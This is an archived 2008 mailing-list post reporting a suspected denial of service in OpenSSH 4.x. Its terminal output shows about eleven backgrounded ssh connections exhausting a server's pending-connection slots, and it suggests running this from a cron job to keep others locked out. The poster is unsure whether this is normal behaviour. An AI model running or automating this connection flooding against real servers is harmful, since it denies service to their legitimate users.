Vulnerability Development mailing list archives
OpenSSH 4.X DoS (maybe...)
From: sipherr () gmail com
Date: 26 Feb 2008 22:13:50 -0000
OpenSSH 4.X deny remote connections. The service itself doesn't crash, but it does NOT allow anyone to connect after 10 or so pending connections. To reproduce: telnet 3.1.33.7 22 Trying 3.1.33.7... Connected to 3.1.33.7. Escape character is '^]'. SSH-2.0-OpenSSH_4.7p1 Debian-2 Protocol mismatch. Connection closed by foreign host. darkstar# ssh 3.1.33.7 The authenticity of host '3.1.33.7 (3.1.33.7)' can't be established. RSA key fingerprint is f9:10:92:7d:8b:70:cb:fe:1c:40:13:7b:6c:e7:d0:bf. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '3.1.33.7' (RSA) to the list of known hosts. root@3.1.33.7's password: darkstar# ssh 3.1.33.7 darkstar# ssh 3.1.33.7 & [1] 12945 darkstar# ssh 3.1.33.7 & [2] 12946 darkstar# ssh 3.1.33.7 & [3] 12947 darkstar# ssh 3.1.33.7 & [4] 12948 darkstar# ssh 3.1.33.7 & [5] 12949 darkstar# ssh 3.1.33.7 & [6] 12950 darkstar# ssh 3.1.33.7 & [7] 12951 darkstar# ssh 3.1.33.7 & [8] 12952 darkstar# ssh 3.1.33.7 & [9] 12953 darkstar# ssh 3.1.33.7 & [10] 12954 darkstar# ssh 3.1.33.7 & [11] 12955 darkstar# ssh_exchange_identification: Connection closed by remote host An attacker could cronjob a script to force this condition to remain true. This will deny anyone else from connecting to the service. Normal behaviour? Shouts: burnout,spithash princess^pookie, #codemasters
Current thread:
- OpenSSH 4.X DoS (maybe...) sipherr (Feb 29)
- Re: OpenSSH 4.X DoS (maybe...) Eygene Ryabinkin (Feb 29)